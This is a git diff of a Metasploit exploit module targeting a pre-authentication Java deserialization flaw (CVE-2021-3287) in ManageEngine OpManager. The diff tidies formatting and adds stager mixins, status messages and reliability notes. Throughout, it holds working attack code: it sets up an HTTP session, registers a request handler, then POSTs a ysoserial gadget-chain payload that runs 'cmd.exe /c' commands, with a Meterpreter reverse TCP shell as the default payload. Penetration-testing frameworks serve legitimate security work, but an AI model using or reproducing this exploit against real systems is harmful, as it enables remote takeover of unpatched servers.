diff --git a/modules/exploits/multi/http/opmanager_sumpdu_deserialization.rb b/modules/exploits/multi/http/opmanager_sumpdu_deserialization.rb index f45d3727ecde0..1661713debc6c 100644 --- a/modules/exploits/multi/http/opmanager_sumpdu_deserialization.rb +++ b/modules/exploits/multi/http/opmanager_sumpdu_deserialization.rb @@ -7,29 +7,29 @@ class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck + include Msf::Exploit::CmdStager include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::JavaDeserialization + include Msf::Exploit::Powershell def initialize(info = {}) - super(update_info(info, - 'Name' => 'ManageEngine OpManager SumPDU Java Deserialization', - 'Description' => %q{ - - }, - 'Author' => - [ + super( + update_info( + info, + 'Name' => 'ManageEngine OpManager SumPDU Java Deserialization', + 'Description' => %q{ + }, + 'Author' => [ 'Spencer McIntyre', # Metasploit module ], - 'License' => MSF_LICENSE, - 'Platform' => 'win', - 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], - 'References' => - [ + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], + 'References' => [ [ 'CVE', '2021-3287' ], [ 'URL', 'https://haxolot.com/posts/2021/manageengine_opmanager_pre_auth_rce/' ] ], - 'Privileged' => true, - 'Targets' => [ + 'Privileged' => true, + 'Targets' => [ [ 'Windows Command', { @@ -45,7 +45,7 @@ def initialize(info = {}) { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :win_dropper, - 'CmdStagerFlavor' => :certutil, # This works without issue + # 'CmdStagerFlavor' => :certutil, # This works without issue 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' } @@ -61,32 +61,40 @@ def initialize(info = {}) } } ] - ], - 'DefaultOptions' => { - 'RPORT' => 8060, - }, - 'DefaultTarget' => 0, - 'DisclosureDate' => '2021-07-26')) + ], + 'DefaultOptions' => { + 'RPORT' => 8060 + }, + 'DefaultTarget' => 0, + 'DisclosureDate' => '2021-07-26', + 'Notes' => { + 'Reliability' => [ REPEATABLE_SESSION ], + 'SideEffects' => [ ARTIFACTS_ON_DISK ], + 'Stability' => [ CRASH_SAFE ] + } + ) + ) register_options([ - OptString.new('TARGETURI', [ true, "OpManager path", '/']) + OptString.new('TARGETURI', [ true, 'OpManager path', '/']) ]) end def check - # todo: write this + # TODO: write this return Exploit::CheckCode::Unknown end def exploit # Step 1: Establish a valid HTTP session res = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path), + 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => true }) - unless res&.code == 200 && res.headers['Set-Cookie'].to_s =~ /JSESSIONID=/ + unless res&.code == 200 && res.get_cookies =~ /JSESSIONID=/ fail_with(Failure::UnexpectedReply, 'Failed to establish an HTTP session') end + print_status('An HTTP session cookie has been issued') # Step 2: Add the requestHandler to the HTTP session res = send_request_cgi({ @@ -99,6 +107,7 @@ def exploit unless res&.code == 200 fail_with(Failure::UnexpectedReply, 'Failed to setup the HTTP session') end + print_status('The request handler has been associated with the HTTP session') # Step 3: Exploit the deserialization vulnerability to run commands case target['Type'] @@ -120,7 +129,7 @@ def execute_command(cmd, _opts = {}) # the frohoff/ysoserial#168 gadget chain is a derivative of CommonsBeanutils1 that has been updated to remove the # dependency on the commons-collections library making it usable in this context - java_payload = Msf::Util::JavaDeserialization.ysoserial_payload('frohoff/ysoserial#168', cmd) + java_payload = Msf::Util::JavaDeserialization.ysoserial_payload('frohoff/ysoserial#168', "cmd.exe /c #{cmd}") res = send_request_cgi({ 'method' => 'POST', @@ -128,5 +137,6 @@ def execute_command(cmd, _opts = {}) 'keep_cookies' => true, 'data' => [ java_payload.length ].pack('N') + java_payload }) + fail_with(Failure::UnexpectedReply, 'Failed to execute the command') unless res&.code == 200 end end